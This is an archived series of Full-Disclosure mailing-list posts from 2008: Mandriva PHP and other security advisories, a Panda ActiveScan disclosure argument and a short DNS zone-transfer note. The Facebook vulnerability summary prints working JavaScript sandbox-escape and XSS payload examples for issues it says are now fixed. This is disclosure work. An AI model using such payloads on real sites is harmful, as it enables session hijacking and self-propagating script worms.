2007.1/x86_64/php-fcgi-5.2.1-4.4mdv2007.1.x86_64.rpm 38445ba58c456587fc010dcfe2125030 2007.1/x86_64/php-imap-5.2.1-1.1mdv2007.1.x86_64.rpm 46f2b06e38148ca0abe2dbb42f6b4a03 2007.1/x86_64/php-openssl-5.2.1-4.4mdv2007.1.x86_64.rpm 83ce7f229b34c075650cfb92fc795f1d 2007.1/x86_64/php-zlib-5.2.1-4.4mdv2007.1.x86_64.rpm 48bdf497322e9b5286a74374d0e1b460 2007.1/SRPMS/php-5.2.1-4.4mdv2007.1.src.rpm 259d657e68e17b093fa76d29b5e5499d 2007.1/SRPMS/php-imap-5.2.1-1.1mdv2007.1.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIbTyYmqjQ0CJFipgRAvphAKCgcxPQQyewh1A/Ujgn/aqKsackLwCg3Iwh 02jgWw5BEmn3GOkHEwuKr8U= =9wP/ -----END PGP SIGNATURE----- From security at mandriva.com Fri Jul 4 04:16:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Jul 2008 21:16:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:129 ] - Updated PHP packages fix multiple vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:129 http://www.mandriva.com/security/ _______________________________________________________________________ Package : php4 Date : July 3, 2008 Affected: Corporate 3.0, Multi Network Firewall 2.0 _______________________________________________________________________ Problem Description: Weaknesses in the GENERATE_SEED macro in PHP prior to 4.4.8 and 5.2.5 were discovered that could produce a zero seed in rare circumstances on 32bit systems and generations a portion of zero bits during conversion due to insufficient precision on 64bit systems (CVE-2008-2107, CVE-2008-2108). The updated packages have been patched to correct these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2107 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108 _______________________________________________________________________ Updated Packages: Corporate 3.0: 60cb1523549183eae75f173db44ce2d7 corporate/3.0/i586/libphp_common432-4.3.4-4.28.C30mdk.i586.rpm 4ba8abbdc22274e036ea6f7ae4909316 corporate/3.0/i586/php432-devel-4.3.4-4.28.C30mdk.i586.rpm 1f3277efa994d0e978704b0e1ef81cee corporate/3.0/i586/php-cgi-4.3.4-4.28.C30mdk.i586.rpm ed7c11b9e615d50c2626cc8651b2aecb corporate/3.0/i586/php-cli-4.3.4-4.28.C30mdk.i586.rpm 8969b7bbe0a389d9c17073a4734afe67 corporate/3.0/SRPMS/php-4.3.4-4.28.C30mdk.src.rpm Corporate 3.0/X86_64: fae5232b68c4347ea4ab1f424001ca36 corporate/3.0/x86_64/lib64php_common432-4.3.4-4.28.C30mdk.x86_64.rpm e2d37f7e766faf61b01570d3b2763900 corporate/3.0/x86_64/php432-devel-4.3.4-4.28.C30mdk.x86_64.rpm c6f7fbbca3e521fd092239da0e542f99 corporate/3.0/x86_64/php-cgi-4.3.4-4.28.C30mdk.x86_64.rpm af7d5aca6faf6a432f19d445e5910c14 corporate/3.0/x86_64/php-cli-4.3.4-4.28.C30mdk.x86_64.rpm 8969b7bbe0a389d9c17073a4734afe67 corporate/3.0/SRPMS/php-4.3.4-4.28.C30mdk.src.rpm Multi Network Firewall 2.0: 0aed85766f3a2938d9c1e33bb5a199ff mnf/2.0/i586/libphp_common432-4.3.4-4.28.C30mdk.i586.rpm c14ad69a438163322e9c4802be2a9162 mnf/2.0/i586/php-cgi-4.3.4-4.28.C30mdk.i586.rpm ed7c11b9e615d50c2626cc8651b2aecb mnf/2.0/i586/php-cli-4.3.4-4.28.C30mdk.i586.rpm 523bafb85ede32063f4738e6426ab23d mnf/2.0/SRPMS/php-4.3.4-4.28.C30mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIbWsumqjQ0CJFipgRAsxRAKCe0zLMaz8Akj/J/HCyhYExLp1GXgCeMKrt qBH74ZN3vFcg99ivslfGoKE= =rQ++ -----END PGP SIGNATURE----- From ureleet at gmail.com Fri Jul 4 04:18:48 2008 From: ureleet at gmail.com (Ureleet) Date: Thu, 3 Jul 2008 23:18:48 -0400 Subject: [Full-disclosure] n3td3v podcast In-Reply-To: <486D4020.50104@buanzo.com.ar> References: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com> <6158bb410807031151u44989fa2qc7db35217e851a0b@mail.gmail.com> <4b6ee9310807031326i68f9b82apc6aab34f2729d1a@mail.gmail.com> <024701c8dd4b$e1c8ad50$a55a07f0$@net> <4b6ee9310807031402hbb1ab53w2b53d760f1d803c0@mail.gmail.com> <486D4020.50104@buanzo.com.ar> Message-ID: <6158bb410807032018x25cc6de0v733e3dd1a2dec8bb@mail.gmail.com> you figured me out! On Thu, Jul 3, 2008 at 5:09 PM, Arturo 'Buanzo' Busleiman wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > n3td3v wrote: > | Keep this thread bookmarked just incase, we don't actually know who > | Ureleet is, it could be an Al-Qaeda splinter cell working > > For all we know, Ureleet could be you. > > - -- > Arturo "Buanzo" Busleiman > Independent Security Consultant - SANS - OISSG > http://www.buanzo.com.ar/pro/eng.html > Mailing List Archives at http://archiver.mailfighter.net > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.6 (GNU/Linux) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iD8DBQFIbUAgAlpOsGhXcE0RClItAJ4ndrkAqFt+szk33UU47U4zmzJeLACfYHHr > t1DO0pkyd18vyilU9E5ePuo= > =kwuM > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From security at mandriva.com Fri Jul 4 04:20:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Jul 2008 21:20:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:130 ] - Updated PHP packages fix multiple vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:130 http://www.mandriva.com/security/ _______________________________________________________________________ Package : php4 Date : July 3, 2008 Affected: Corporate 4.0 _______________________________________________________________________ Problem Description: An integer overflow in the zip_read_entry() function in PHP prior to 4.4.5 allowed remote attackers to execute arbitrary code via a ZIP archive containing a certain type of entry that triggered a heap overflow (CVE-2007-1777). Weaknesses in the GENERATE_SEED macro in PHP prior to 4.4.8 and 5.2.5 were discovered that could produce a zero seed in rare circumstances on 32bit systems and generations a portion of zero bits during conversion due to insufficient precision on 64bit systems (CVE-2008-2107, CVE-2008-2108). The updated packages have been patched to correct these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1777 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2107 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108 _______________________________________________________________________ Updated Packages: Corporate 4.0: 070c4d4f7403e8a88cebf04ec8332d9c corporate/4.0/i586/libphp4_common4-4.4.4-1.8.20060mlcs4.i586.rpm d4a5b569f487d6d0cd9c32e6c57973e2 corporate/4.0/i586/php4-cgi-4.4.4-1.8.20060mlcs4.i586.rpm cc39060ca799894fd2e0e31bdc588d93 corporate/4.0/i586/php4-cli-4.4.4-1.8.20060mlcs4.i586.rpm b9445da53d60e15b815d702bb0639b2c corporate/4.0/i586/php4-devel-4.4.4-1.8.20060mlcs4.i586.rpm 89578a93f8389f1c18a9ec2bb2976c3d corporate/4.0/i586/php4-zip-4.4.4-1.1.20060mlcs4.i586.rpm 1bd1828056a9485094c3f8dcad359868 corporate/4.0/SRPMS/php4-4.4.4-1.8.20060mlcs4.src.rpm 1c44162aa2dd129612450a61427e94f4 corporate/4.0/SRPMS/php4-zip-4.4.4-1.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: fbc3b649e7429a3dc6e53e367eaf0eb4 corporate/4.0/x86_64/lib64php4_common4-4.4.4-1.8.20060mlcs4.x86_64.rpm 62ec98b2fdf5656e84afa1423f5e757b corporate/4.0/x86_64/php4-cgi-4.4.4-1.8.20060mlcs4.x86_64.rpm 6cfc64f13467e939995d00f5b9293701 corporate/4.0/x86_64/php4-cli-4.4.4-1.8.20060mlcs4.x86_64.rpm a158811bab4ffcc278660fc6bb0b8eb3 corporate/4.0/x86_64/php4-devel-4.4.4-1.8.20060mlcs4.x86_64.rpm e5eec77b3270124b1a68689aa0b3362b corporate/4.0/x86_64/php4-zip-4.4.4-1.1.20060mlcs4.x86_64.rpm 1bd1828056a9485094c3f8dcad359868 corporate/4.0/SRPMS/php4-4.4.4-1.8.20060mlcs4.src.rpm 1c44162aa2dd129612450a61427e94f4 corporate/4.0/SRPMS/php4-zip-4.4.4-1.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIbWw0mqjQ0CJFipgRAm3BAKDadkkRtJshMaEt5uWC7vi0OQuEpwCgwWSu Agn3VI+92DBfD+BQzRSoQhU= =nH2f -----END PGP SIGNATURE----- From jouko at iki.fi Fri Jul 4 10:46:05 2008 From: jouko at iki.fi (Jouko Pynnonen) Date: Fri, 4 Jul 2008 12:46:05 +0300 Subject: [Full-disclosure] Facebook script injection vulnerabilities In-Reply-To: <7af564ad0807021601pfd2a87clcc124fbe8b897510@mail.gmail.com> References: <7af564ad0807021601pfd2a87clcc124fbe8b897510@mail.gmail.com> Message-ID: <7af564ad0807040246s2ebd7a20r2e84e2dd233f1314@mail.gmail.com> The two remaining vulnerabilities seem to have been fixed today. Updated information: 7) Escaping JS sandbox with literal String reference Impact: execution of unrestricted JS on canvas pages or profiles (mouseclick required on profile pages) Browsers: FF Description: __parent__ property of a String object can be referenced using a literal expression and the "bracket syntax" to get a Window reference. Reported: June 21, 2008 Fixed: yes Example: "a"["__parent__"].eval("alert('any javascript here');"); 8) Escaping JS sandbox with literal RegExp reference Impact: execution of unrestricted JS on canvas pages or profiles (mouseclick required on profile pages) Browsers: FF Description: __parent__ property of a RegExp object can be referenced using a literal expression and the "bracket syntax" to get a Window reference. Reported: June 21, 2008 Fixed: yes Example: /a/["__parent__"].eval("alert('any javascript here');"); On Thu, Jul 3, 2008 at 2:01 AM, Jouko Pynnonen wrote: > Hello, > > This is a summary of various Facebook security issues found and > reported since June 13, 2008. Two of the vulnerabilities still remain > on the site, so no details of them are disclosed here. The rest have > been fixed. > > Any of these could be exploited to take over the victim's web browser > temporarily to e.g. read inbox messages, forcibly install FB > applications, manipulate friend lists, post messages as the victim > user, etc. Any of these would also allow creation of a > self-propagating JavaScript virus/worm. > > Most of the issues require the victim user to click on a profile box > or visit a canvas page of an application in order to trigger the > injected JavaScript. Issues 2) and 3) don't require mouse clicks. > > The vulnerabilities were tested with two browsers: Firefox 3 (Linux + > Windows) and Internet Explorer 7. > > > > 1) Escaping JS sandbox with literal Function constructor reference > Impact: execution of unrestricted JS on canvas pages or profiles > (mouseclick required on profile pages) > Description: The JS sandbox denies references to Function.constructor > but using a literal such as "function f() { }" in the code and > refering to its constructor with the "bracket syntax" was possible. > The example below uses this method and calls the constructor with a > string argument, then calls the resulting Function object. > Browsers: FF, IE > Reported: June 13, 2008 > Fixed: yes > Example: > > (function f(){}["constructor"]("alert('any javascript here');"))(); > > > > 2) Fb:silverlight JS injection > Impact: execution of unrestricted JS on canvas pages, profiles > Description: Simple XSS, described in the previous message to full-disclosure. > Browsers: FF, IE > Reported: June 16, 2008 > Fixed: yes > Example: > > width="\" height=",any_javascript_code_here);//" /> > > > > 3) Injecting JS in Feeds > Impact: execution of unrestricted JS when viewing Feeds on profile > page or the "home" page > Description: Insufficient input validation in the > publishTemplatizedAction API method. > Browsers: FF, IE > Reported: June 16, 2008 > Fixed: yes > Example: > > # using the perl API > > $facebook->feed->publish_templatized_action( title => "My Title", > title_template => "{actor} is testing feed stories", > body_template => "hello", > image_1 => "http://www.mysite.com/image.gif'\" > onload=(function f(){}['constructor']('alert(1)'))();", > image_1_link => "http://www.mysite.com" ); > > > > 4) Escaping JS sandbox with literal Number reference > Impact: execution of unrestricted JS on canvas pages or profiles > (mouseclick required on profile pages) > Description: Using the "bracket syntax" to reference the __parent__ > property of a floating point number to get a Window object reference, > then calling its eval() to run arbitrary code. IE doesn't support the > property. > Browsers: FF > Reported: June 18, 2008 > Fixed: yes > Example: > > > > > > 5) Injecting JS in video attachments > Impact: execution of unrestricted JS when a inbox, wall or forum > message is viewed (mouseclick required) > Description: When sharing video content with the > http://www.facebook.com/sharer.php form, some input fields can be > modified e.g. with JavaScript. The example below can be typed in the > address bar to inject JS in a message. > Browsers: FF, IE > Reported: June 20, 2008 > Fixed: yes > Example: > > javascript:f=document.forms[0];f['attachment[params][video][src]'].value='#" > a=b> > > > > 6) Escaping JS sandbox with E4X > Impact: execution of unrestricted JS on canvas pages or profiles > (mouseclick required on profile pages). Works in browsers supporting > E4X (Firefox) > Description: JS parser in browsers supporting E4X understand XML, > which can contain multi-line strings. Facebook's JS sandbox technology > didn't expect XML and multi-line strings. The example below > demonstrates how this could be used to fool the sandbox logic. > Browsers: FF > Reported: June 26, 2008 > Fixed: yes > Example: > > > > > > 7) Escaping JS sandbox > Impact: execution of unrestricted JS on canvas pages or profiles > (mouseclick required on profile pages) > Browsers: FF > Reported: June 21, 2008 > Fixed: no > > > > 8) Escaping JS sandbox > Impact: execution of unrestricted JS on canvas pages or profiles > (mouseclick required on profile pages) > Browsers: FF > Reported: June 21, 2008 > Fixed: no > > > > > -- > Jouko Pynn?nen > http://iki.fi/jouko > Finland > -- Jouko Pynn?nen http://iki.fi/jouko Finland From karol at wiesek.pl Sat Jul 5 10:59:02 2008 From: karol at wiesek.pl (=?ISO-8859-2?Q?Karol_Wi=EAsek?=) Date: Sat, 05 Jul 2008 11:59:02 +0200 Subject: [Full-disclosure] Panda ActiveScan 2.0 remote code execution Message-ID: <486F45E6.8070203@wiesek.pl> http://karol.wiesek.pl/files/panda.tgz K. From secure at pandasecurity.com Fri Jul 4 12:02:13 2008 From: secure at pandasecurity.com (Panda Security Response) Date: Fri, 4 Jul 2008 13:02:13 +0200 Subject: [Full-disclosure] Panda ActiveScan 2.0 remote code execution Message-ID: <84ECAF53A2F0F045BD9B7FD0FC56A0BD0B4C0554@ESMADEXH02.MADRID.PANDASOFTWARE.LOCAL> Please allow at least one week for us to respond before public disclousure. We only received this information a few days ago. Regards, ---------------------------------------------- Pedro Bustamante Senior Research Advisor Panda Security email: pedro.bustamante at pandasecurity.com <0xC684A6F9> vulns: secure at pandasecurity.com <0x70F3FEA0> phone: (+34) 91-8063700 blog: http://research.pandasoftware.com ---------------------------------------------- > -----Mensaje original----- > De: full-disclosure-bounces at lists.grok.org.uk > [mailto:full-disclosure-bounces at lists.grok.org.uk] En nombre > de Karol Wiesek > Enviado el: Saturday, July 05, 2008 11:59 AM > Para: full-disclosure at lists.grok.org.uk > Asunto: [Full-disclosure] Panda ActiveScan 2.0 remote code execution > > http://karol.wiesek.pl/files/panda.tgz > > K. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > From charles.lists at gmail.com Fri Jul 4 12:41:54 2008 From: charles.lists at gmail.com (Charles Majola) Date: Fri, 04 Jul 2008 13:41:54 +0200 Subject: [Full-disclosure] Panda ActiveScan 2.0 remote code execution In-Reply-To: <84ECAF53A2F0F045BD9B7FD0FC56A0BD0B4C0554@ESMADEXH02.MADRID.PANDASOFTWARE.LOCAL> References: <84ECAF53A2F0F045BD9B7FD0FC56A0BD0B4C0554@ESMADEXH02.MADRID.PANDASOFTWARE.LOCAL> Message-ID: <486E0C82.70200@gmail.com> Embarassing init? Panda Security Response wrote: > Please allow at least one week for us to respond before public disclousure. We only received this information a few days ago. > > Regards, > > ---------------------------------------------- > Pedro Bustamante > Senior Research Advisor > Panda Security > > email: pedro.bustamante at pandasecurity.com <0xC684A6F9> > vulns: secure at pandasecurity.com <0x70F3FEA0> > phone: (+34) 91-8063700 > blog: http://research.pandasoftware.com > ---------------------------------------------- > > > > > >> -----Mensaje original----- >> De: full-disclosure-bounces at lists.grok.org.uk >> [mailto:full-disclosure-bounces at lists.grok.org.uk] En nombre >> de Karol Wiesek >> Enviado el: Saturday, July 05, 2008 11:59 AM >> Para: full-disclosure at lists.grok.org.uk >> Asunto: [Full-disclosure] Panda ActiveScan 2.0 remote code execution >> >> http://karol.wiesek.pl/files/panda.tgz >> >> K. >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> >> >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > From randy at procyonlabs.com Fri Jul 4 13:59:40 2008 From: randy at procyonlabs.com (Randal T. Rioux) Date: Fri, 4 Jul 2008 08:59:40 -0400 (EDT) Subject: [Full-disclosure] Panda ActiveScan 2.0 remote code execution In-Reply-To: <84ECAF53A2F0F045BD9B7FD0FC56A0BD0B4C0554@ESMADEXH02.MADRID.PANDASOFTW ARE.LOCAL> References: <84ECAF53A2F0F045BD9B7FD0FC56A0BD0B4C0554@ESMADEXH02.MADRID.PANDASOFTWARE.LOCAL> Message-ID: <18251.192.168.3.1.1215176380.squirrel@192.168.3.2> On Fri, July 4, 2008 7:02 am, Panda Security Response wrote: > Please allow at least one week for us to respond before public > disclousure. We only received this information a few days ago. > > Regards, > > ---------------------------------------------- Pedro Bustamante Senior > Research Advisor Panda Security It takes a week to hit the "respond" button? At least be polite and read your mail, perhaps with a quick "stand by, we're looking into it" response so folks think you care. We are an impatient lot in this community. From NetExpress at tiscali.it Fri Jul 4 13:51:55 2008 From: NetExpress at tiscali.it (NetExpress) Date: Fri, 04 Jul 2008 14:51:55 +0200 Subject: [Full-disclosure] zonedit.com e dns zone transfer Message-ID: <486E1CEB.7010307@tiscali.it> For it domain, nic.it do not act as default secondary dns, so anyone have a .it domain have to buy a secondary dns service if hasn't one. zoneedit.com sell this kind of service By default if you leave blank on permit zone forward box anyone on internet could make a zonetransfer. So You con have set an acl on your primary dns server, but thi is bypassed if you use secondary dns server it it is on zonedit.com with defalut configuration parameter. NetExpress From rholgstad at gmail.com Fri Jul 4 15:25:29 2008 From: rholgstad at gmail.com (Robert Holgstad) Date: Fri, 4 Jul 2008 09:25:29 -0500 Subject: [Full-disclosure] Panda ActiveScan 2.0 remote code execution In-Reply-To: <84ECAF53A2F0F045BD9B7FD0FC56A0BD0B4C0554@ESMADEXH02.MADRID.PANDASOFTWARE.LOCAL> References: <84ECAF53A2F0F045BD9B7FD0FC56A0BD0B4C0554@ESMADEXH02.MADRID.PANDASOFTWARE.LOCAL> Message-ID: <1278b0690807040725w26cf41edmcab3a6db8c87145e@mail.gmail.com> no one cares about your slow response time or that it takes you a week to fix a bug that apps have had for 10 years. maybe if your product did not suck so much you would get more respect.. now get off the list dbag. On Fri, Jul 4, 2008 at 6:02 AM, Panda Security Response < secure at pandasecurity.com> wrote: > Please allow at least one week for us to respond before public disclousure. > We only received this information a few days ago. > > Regards, > > ---------------------------------------------- > Pedro Bustamante > Senior Research Advisor > Panda Security > > email: pedro.bustamante at pandasecurity.com <0xC684A6F9> > vulns: secure at pandasecurity.com <0x70F3FEA0> > phone: (+34) 91-8063700 > blog: http://research.pandasoftware.com > ---------------------------------------------- > > > > > > -----Mensaje original----- > > De: full-disclosure-bounces at lists.grok.org.uk > > [mailto:full-disclosure-bounces at lists.grok.org.uk] En nombre > > de Karol Wiesek > > Enviado el: Saturday, July 05, 2008 11:59 AM > > Para: full-disclosure at lists.grok.org.uk > > Asunto: [Full-disclosure] Panda ActiveScan 2.0 remote code execution > > > > http://karol.wiesek.pl/files/panda.tgz > > > > K. > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080704/3048e4e5/attachment.html From security at mandriva.com Fri Jul 4 21:58:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Jul 2008 14:58:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:131 ] - Updated phpMyAdmin packages fix multiple vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:131 http://www.mandriva.com/security/ _______________________________________________________________________ Package : phpMyAdmin Date : July 4, 2008 Affected: Corporate 4.0 _______________________________________________________________________ Problem Description: A few vulnerabilities and security-related issues have been fixed in phpMyAdmin since the 2.11.2.2 release. This update provides version 2.11.7 which is the latest stable release of phpMyAdmin and fixes CVE-2008-1149, CVE-2008-1567, CVE-2008-1924, and CVE-2008-2960. No configuration changes should be required since the previous update (version 2.11.2.2). If upgrading from older versions, it may be necessary to reconfigure phpMyAdmin. The configuration file is located in /etc/phpMyAdmin/. In most cases, it should be sufficient so simply replace config.default.php with config.default.php.rpmnew and make whatever modifications are necessary. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1149 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1567 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1924 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2960 _______________________________________________________________________ Updated Packages: Corporate 4.0: e0808e7ccb437c0da416c979605d0f9f corporate/4.0/i586/phpMyAdmin-2.11.7-0.1.20060mlcs4.noarch.rpm 31c0d1f53b3b9ca46cfb057fea859428 corporate/4.0/SRPMS/phpMyAdmin-2.11.7-0.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: e0808e7ccb437c0da416c979605d0f9f corporate/4.0/x86_64/phpMyAdmin-2.11.7-0.1.20060mlcs4.noarch.rpm 31c0d1f53b3b9ca46cfb057fea859428 corporate/4.0/SRPMS/phpMyAdmin-2.11.7-0.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIbmQlmqjQ0CJFipgRAiOLAKCWT4FG2bbn7i0KrRJhZ0Uj15FZaQCfav8j zk1La9gfrLbWwxqjHoAO7uk= =imOk -----END PGP SIGNATURE----- From secure at pandasecurity.com Fri Jul 4 22:08:13 2008 From: secure at pandasecurity.com (Panda Security Response) Date: Fri, 4 Jul 2008 23:08:13 +0200 Subject: [Full-disclosure] Panda ActiveScan 2.0 remote code execution Message-ID: <84ECAF53A2F0F045BD9B7FD0FC56A0BD0B4C079A@ESMADEXH02.MADRID.PANDASOFTWARE.LOCAL> The fixed version is now in production. Regards, ---------------------------------------------- Pedro Bustamante Senior Research Advisor Panda Security email: pedro.bustamante at pandasecurity.com <0xC684A6F9> vulns: secure at pandasecurity.com <0x70F3FEA0> phone: (+34) 91-8063700 blog: http://research.pandasoftware.com ---------------------------------------------- > -----Mensaje original----- > De: full-disclosure-bounces at lists.grok.org.uk > [mailto:full-disclosure-bounces at lists.grok.org.uk] En nombre > de Karol Wiesek > Enviado el: s?bado, 05 de julio de 2008 11:59 > Para: full-disclosure at lists.grok.org.uk > Asunto: [Full-disclosure] Panda ActiveScan 2.0 remote code execution > > http://karol.wiesek.pl/files/panda.tgz > > K. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > From elazar at hushmail.com Fri Jul 4 22:39:35 2008 From: elazar at hushmail.com (Elazar Broad) Date: Fri, 04 Jul 2008 17:39:35 -0400 Subject: [Full-disclosure] Panda ActiveScan 2.0 remote code execution Message-ID: <20080704213936.436C4D0331@mailserver10.hushmail.com> "We are an impatient lot in this community." - well said... On Fri, 04 Jul 2008 08:59:40 -0400 "Randal T. Rioux" wrote: >On Fri, July 4, 2008 7:02 am, Panda Security Response wrote: >> Please allow at least one week for us to respond before public >> disclousure. We only received this information a few days ago. >> >> Regards, >> >> ---------------------------------------------- Pedro Bustamante >Senior >> Research Advisor Panda Security > >It takes a week to hit the "respond" button? At least be polite >and read >your mail, perhaps with a quick "stand by, we're looking into it" >response >so folks think you care. > >We are an impatient lot in this community. > > > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ -- Compete with the big boys. Click here to find products to benefit your business. http://tagline.hushmail.com/fc/Ioyw6h4eDJdoYMf9jwXhRS1vcQ5SY7Clj2fZDwCxnPavpwEfO6QAkA/ From security at mandriva.com Fri Jul 4 23:26:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Jul 2008 16:26:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:132 ] - Updated gnome-screensaver packages fix authentication vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:132 http://www.mandriva.com/security/ _______________________________________________________________________ Package : gnome-screensaver Date : July 4, 2008 Affected: 2008.0 _______________________________________________________________________ Problem Description: A vulnerability was found in gnome-screensaver prior to 2.22.1 when a remote authentication server was enabled. During a network outage, gnome-screensaver would crash upon an unlock attempt, allowing physically local users to gain access to locked sessions (CVE-2008-0887). The updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0887 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 3d403fc224bbb02d74eaddba0048225b 2008.0/i586/gnome-screensaver-2.20.0-2.1mdv2008.0.i586.rpm 653c5654fcc4451f66eb165cad10bd17 2008.0/SRPMS/gnome-screensaver-2.20.0-2.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: d29ba53d61c163fcd0d16bc012af5180 2008.0/x86_64/gnome-screensaver-2.20.0-2.1mdv2008.0.x86_64.rpm 653c5654fcc4451f66eb165cad10bd17 2008.0/SRPMS/gnome-screensaver-2.20.0-2.1mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIbnlBmqjQ0CJFipgRAmrpAJ4pjogxYidKc6dIzVh+fg/y0WWEWACfRWg2 a4s4HJsPaYWPS6aEw+cChFg= =JWTr -----END PGP SIGNATURE----- From security at mandriva.com Fri Jul 4 23:46:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Fri, 04 Jul 2008 16:46:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:133 ] - Updated sympa packages fix DoS vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- 